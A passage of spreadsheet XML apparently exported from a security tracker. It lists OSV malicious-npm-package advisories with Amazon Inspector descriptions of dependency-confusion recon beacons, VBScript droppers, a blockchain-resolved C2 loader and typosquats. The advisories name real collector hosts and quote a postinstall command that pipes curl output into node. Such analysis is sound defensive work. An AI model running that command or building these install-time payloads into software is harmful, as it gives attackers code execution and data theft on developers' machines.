The package is published as `rgx33-css-grid-utils` but exports a set of module keys matching Wix thunderbolt internal registries (`thunderboltRegistry`, `siteAssetsRegistry`, `editorRegistry`, `corvidRegistry`, `dataBindingRegistry`, `documentManagementRegistry`, and others) — a dependency-confusion lure targeting Wix's internal build/runtime namespace. On module load, an IIFE collects host identifiers (hostname, pid, Node version, platform) and runs `child_process.execSync('id')` and `child_process.execSync('uname -r')` to capture the current user and kernel version. These values are encoded as DNS subdomain labels and sent via `fetch` to the interactsh/OOB collector `davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live`, and in parallel to `https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba` with a `where=wix-blog` query parameter identifying the campaign target. The package ships no CSS grid functionality consistent with its name; the reconnaissance beacon is the entire payload.
</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17520</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17521</t>
        </is>
      </c>
      <c r="D178" s="5" t="inlineStr"/>
      <c r="E178" s="5" t="inlineStr"/>
      <c r="F178" s="5" t="inlineStr"/>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>npm:rgx33-flex-layout-core</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr"/>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02200327d66cf0661b787f58049b55b5fbb95dfb76fbb81a679cc71439bd85eb)
Package name and exports (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) impersonate internal Wix thunderbolt registry packages, targeting Wix build pipelines via dependency confusion. On require, thunderboltRegistry.js executes `id` and `uname -r` via child_process.execSync and collects hostname, pid, Node.js version, and platform. These values are encoded into subdomains of an attacker-controlled Interactsh/OAST callback domain (davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live) and also POSTed to a webhook.site collector (webhook.site/0492a36c-4d7b-408a-865c-226db25987ba). The exfiltration behavior has no relation to the package's advertised 'flexbox layout utilities' purpose, and the manifest references to static.parastorage.com paths reinforce the Wix-targeted dependency-confusion shape.
</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17521</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17522</t>
        </is>
      </c>
      <c r="D179" s="5" t="inlineStr"/>
      <c r="E179" s="5" t="inlineStr"/>
      <c r="F179" s="5" t="inlineStr"/>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>npm:studiocode_eligibility</t>
        </is>
      </c>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr"/>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a49b1af8bbf0463bb38d3049e59c28b0dcc8d2e3e5ef54611b4e77bddfdd36dc)
package.json declares a postinstall hook `wscript.exe 4444.vbs` that automatically executes a 765KB VBScript shipped in the tarball on Windows installers. The VBS contains multi-layer obfuscation (XOR-decoded AES S-boxes, SHA-256 constants, a ChaCha20 stream layer, and a large Base64 'ArtifactBundleHX' blob) that decrypts a PowerShell loader, writes it to %TEMP%\pf#####.dat, and invokes it via powershell.exe using process-hollowing-style techniques. The library source (src/index.js) is a small Zod-based email-domain eligibility checker that is unrelated to the VBS payload and serves as cover. The README explicitly claims 'Checks run locally, without network requests' and 'There are no installation scripts', directly contradicting the declared postinstall hook and shipped dropper. Running `npm install studiocode_eligibility` on Windows grants the package author arbitrary code execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17522</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17523</t>
        </is>
      </c>
      <c r="D180" s="5" t="inlineStr"/>
      <c r="E180" s="5" t="inlineStr"/>
      <c r="F180" s="5" t="inlineStr"/>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr">
        <is>
          <t>npm:studiocode_tools</t>
        </is>
      </c>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr"/>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (261d413c0847b530c9a452c209c25e0a7d9123f9b0f20b26d0afcc41a929c74a)
package.json declares a postinstall hook that runs `wscript.exe 4444.vbs`, auto-executing on `npm install` on Windows. The shipped 4444.vbs contains hand-rolled AES and ChaCha20 implementations with XOR-obfuscated S-boxes, SHA-256 round constants XORed with 0x5A5A5A5A, and hundreds of base64 ciphertext fragments (`ArtifactBundleHX`) that are reassembled and decrypted at runtime into a PowerShell loader. The script writes a payload file to `%TEMP%\pfNNNNN.dat` and invokes `powershell.exe` to perform process hollowing of the decrypted payload. The VBS carries cover-story branding as 'Verdant Signals Corp' / 'Device Telemetry Aggregator', and the README falsely states 'There are no installation scripts.' The multi-layer custom cryptography, false branding, and explicit README denial of install scripts are unambiguous indicators of hostile intent rather than legitimate functionality.
</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17523</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17524</t>
        </is>
      </c>
      <c r="D181" s="5" t="inlineStr"/>
      <c r="E181" s="5" t="inlineStr"/>
      <c r="F181" s="5" t="inlineStr"/>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr">
        <is>
          <t>npm:tailwindcss-forms-styles</t>
        </is>
      </c>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr"/>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (587d9a389f35a8ec2d3ed714c90f7daa43feb6875f4ce2e4280f5ce19569d895)
The package name tailwindcss-forms-styles mimics the legitimate @tailwindcss/forms plugin, and its src/index.js copies that plugin's code verbatim as cover. Above the cover code, a top-level IIFE joins a ~140-element base64 string array, atob()-decodes it, and eval()s the result. The decoded loader queries public Ethereum RPC/Blockscout endpoints for the most recent transaction sent by hardcoded address 0xa322E5f3D311D3080e6f0121063e9aDC2490Ef1a, parses two IPv4 addresses out of the transaction recipient field, downloads an XOR-encoded JavaScript payload from staging URLs of the form http://&lt;ip&gt;:443/0x/cls and http://&lt;ip&gt;:443/0x/ls, and executes it via eval and a detached spawn('node', ['-e',...]) child process. Because the IIFE runs at module load, any consumer that performs require('tailwindcss-forms-styles') triggers remote code execution on the installer, with the command-and-control endpoint resolved dynamically from the blockchain so the C2 can be rotated without changing the package.
</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17524</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17525</t>
        </is>
      </c>
      <c r="D182" s="5" t="inlineStr"/>
      <c r="E182" s="5" t="inlineStr"/>
      <c r="F182" s="5" t="inlineStr"/>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-css-token-parser</t>
        </is>
      </c>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr"/>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee63fae51fceee7c4d3c5051e191e477ca9bb8302f6fc4d3d07f5446951efa0f)
Package is advertised as a CSS token parser but ships thunderboltRegistry.js which runs an IIFE on module load that collects hostname, pid, Node version, platform, and the output of `id` and `uname -r` via child_process.execSync, then exfiltrates them as DNS/HTTP subdomains under an oast.live interact.sh collector and a POST to webhook.site/0492a36c-4d7b-408a-865c-226db25987ba with a `where=internetbrands` tag. The package manifest aliases seven internal Wix Thunderbolt registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) to the same recon module and exports factories under those keys, so any loader that resolves those internal names to this public package will execute the recon payload. The name/description are a cover story; the actual behavior is targeted dependency-confusion reconnaissance against Wix's internetbrands build graph.
</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17525</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17526</t>
        </is>
      </c>
      <c r="D183" s="5" t="inlineStr"/>
      <c r="E183" s="5" t="inlineStr"/>
      <c r="F183" s="5" t="inlineStr"/>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-dom-focus-trap</t>
        </is>
      </c>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr"/>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (84262096595a1e0ce09bbaa359930cd07cf420cc72545174ddc4f12c60bec962)
The package is advertised as a focus-trap utility but thunderboltRegistry.js runs an IIFE at require time that uses child_process.execSync to run whoami, id, pwd, ifconfig / ip addr, hostname, and to read /etc/hosts, then sends each command's output as query parameters to http://dxpoc.gt.tc/callback.php via fetch. A separate beacon containing Node version, platform, and pid is also posted to the same endpoint. The package additionally impersonates Wix 'thunderbolt' internal registry module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry) and references static.parastorage.com manifest URLs, matching a dependency-confusion lure aimed at Wix build environments. Installing or importing this package causes the installer host's identity, network configuration, and /etc/hosts contents to be sent to an attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17526</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17527</t>
        </is>
      </c>
      <c r="D184" s="5" t="inlineStr"/>
      <c r="E184" s="5" t="inlineStr"/>
      <c r="F184" s="5" t="inlineStr"/>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-focusgroup-helper</t>
        </is>
      </c>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr"/>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9c6d210f6c61d0ec49fac4bf487a2d71966b1f3dd59653d8a8fdf12e04f9b306)
tiny-focusgroup-helper@1.0.0 declares itself as a focus-group accessibility helper, but thunderboltRegistry.js runs an IIFE at require time that executes `whoami`, `uname -a`, `ifconfig`/`ip addr`, and reads `/etc/hosts` via child_process, and POSTs/GETs the output as query parameters to the hardcoded plaintext endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3, along with a beacon containing node version, platform, and pid. The dxpoc.gt.tc host is a dynamic-DNS domain unrelated to any legitimate publisher. The package's exported surface (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) mirrors internal Wix thunderbolt registry module names and the shipped manifest references static.parastorage.com, consistent with a dependency-confusion/module-impersonation lure targeting Wix build environments.
</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17527</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17528</t>
        </is>
      </c>
      <c r="D185" s="5" t="inlineStr"/>
      <c r="E185" s="5" t="inlineStr"/>
      <c r="F185" s="5" t="inlineStr"/>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>npm:tiny-viewport-unit-calc</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr"/>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (34c221d8f8f0fedded27bfc22763912ffd96e9f3d1b2c08932e054ed418f493e)
The package ships thunderboltRegistry.js, a module that imports Node's child_process primitives and executes `whoami` plus repeated `ping` commands against external hostnames, with POST calls present in the same file. The pattern (whoami capture + repeated ping-based beacons + outbound POSTs) is host-reconnaissance and DNS/ICMP-channel exfiltration shape, directed from the installer's machine to an external endpoint. The behavior is unrelated to the package's advertised purpose (a trivial viewport-unit calculator) and provides no functionality to a consumer; its only effect is to leak host identity information off-host when the module is loaded or invoked.
</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17528</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17529</t>
        </is>
      </c>
      <c r="D186" s="5" t="inlineStr"/>
      <c r="E186" s="5" t="inlineStr"/>
      <c r="F186" s="5" t="inlineStr"/>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>npm:ultimate-websocket</t>
        </is>
      </c>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr"/>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7574e423b830695141ee6e089006e0c355109e240c69881512806869cfee8114)
package.json declares its only dependency `node-net-pool` as a bare tarball URL pointing at the mutable `main` branch of an unrelated GitHub user (`https://github.com/trktgq0wbre1/node-net-pool/archive/refs/heads/main.tar.gz`), bypassing the npm registry entirely. There is no version pin, no commit SHA, and no integrity hash, so `npm install` fetches whatever bytes that URL currently returns and runs any lifecycle scripts contained in them. The package's own `scripts.postinstall` additionally executes `node -e "...require('node-net-pool')..."`, loading the fetched module at install time so its top-level code also runs on the installer's host. The GitHub account is a throwaway-shaped handle unrelated to the publishing identity, and the shipped tarball contains no real functionality — its only install-time effect is to pull and execute attacker-controlled code from an endpoint whose contents the author can change at any time.
</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17529</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17530</t>
        </is>
      </c>
      <c r="D187" s="5" t="inlineStr"/>
      <c r="E187" s="5" t="inlineStr"/>
      <c r="F187" s="5" t="inlineStr"/>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>npm:wcag-color-a11y-helpers</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr"/>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8b6e72298f32298d6558f5d52eb7a9d5185b37fe8df14748bf61d6686dde1cb3)
Package is advertised as a WCAG color accessibility helper library but ships thunderboltRegistry.js, an IIFE that on module load executes shell commands (whoami, id, pwd, ifconfig/ip addr, hostname) and transmits the output via HTTP GET and DNS subdomain lookups to the hardcoded Burp Collaborator host gzjsunzfc6i9od2ouhb6dl4a61cs0qof.oastify.com, along with node/platform/pid metadata and an 'rce-poc' beacon string. The package exports factory functions under names mirroring Wix Thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, autoCompleteRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry), and ships a registry-manifest.min.json that maps all of those registry names to thunderboltRegistry.js — a dependency-confusion/typosquat shape against Wix's @wix/thunderbolt-* internal registries. Any consumer that resolves one of these names loads and executes the recon/exfiltration payload. The a11y naming is a cover story unrelated to the actual code.
</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17530</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17531</t>
        </is>
      </c>
      <c r="D188" s="5" t="inlineStr"/>
      <c r="E188" s="5" t="inlineStr"/>
      <c r="F188" s="5" t="inlineStr"/>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>npm:api-nebula</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr"/>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b8232ec7756422686c2bce805fc87821e61a5bd9176cdb2fe7c3190fd2b2eae2)
The package declares `"preinstall": "node preinstall.cjs"` in package.json, and preinstall.cjs is a single-line ~187 KB `Function("pbeIUC", "…")` invocation implementing a custom PRNG plus string-table decoder (numeric constant table, printable-charset string table `UclPgF`, a Bob-Jenkins-style mixer, and a decoder that reconstructs strings via modular arithmetic against `UclPgF.charCodeAt(...)`). The file contains no readable logic — its entire payload is an opaque blob that is decoded and handed to the JS engine during `npm install`. String fragments visible pre-decoding (e.g. `F.kI`, `zehSPTc@y.Ge`, `vCpP.BB/.i+gUAKa`) are placeholder-shaped and only resolve to real hosts/commands after runtime decoding, so the actual install-time behavior and any network destinations are hidden from static inspection. The wrapper module (nebula.js) and package.json declare no native build step, no compilation, and no other legitimate reason for a 187 KB obfuscated preinstall script. This is the canonical obfuscated npm preinstall dropper shape: arbitrary attacker-authored code executes on every installer's machine at `npm install` time, with intent to evade review deliberately concealed by the string-table + Function-eval loader.
</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17531</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17532</t>
        </is>
      </c>
      <c r="D189" s="5" t="inlineStr"/>
      <c r="E189" s="5" t="inlineStr"/>
      <c r="F189" s="5" t="inlineStr"/>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>npm:@abgular/core</t>
        </is>
      </c>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr"/>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4c4c8470613dc3a49e249f1a9f91bc756bb9b4323c78268b35816f07e78a0a9b)
Package name `@abgular/core` is a single-character transposition of `@angular/core` and copies that package's description, author, and repository metadata. The package.json declares a `postinstall` script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party code-hosting service via web.archive.org and piping it directly into `node` during `npm install`. The fetched code executes on the installer's machine with the installer's privileges; its contents are mutable and attacker-controlled. The deceptive package identity ensures developers who mistype `@angular/core` trigger this remote-code execution.
</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17532</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17533</t>
        </is>
      </c>
      <c r="D190" s="5" t="inlineStr"/>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="inlineStr"/>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr">
        <is>
          <t>npm:@anfular/core</t>
        </is>
      </c>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
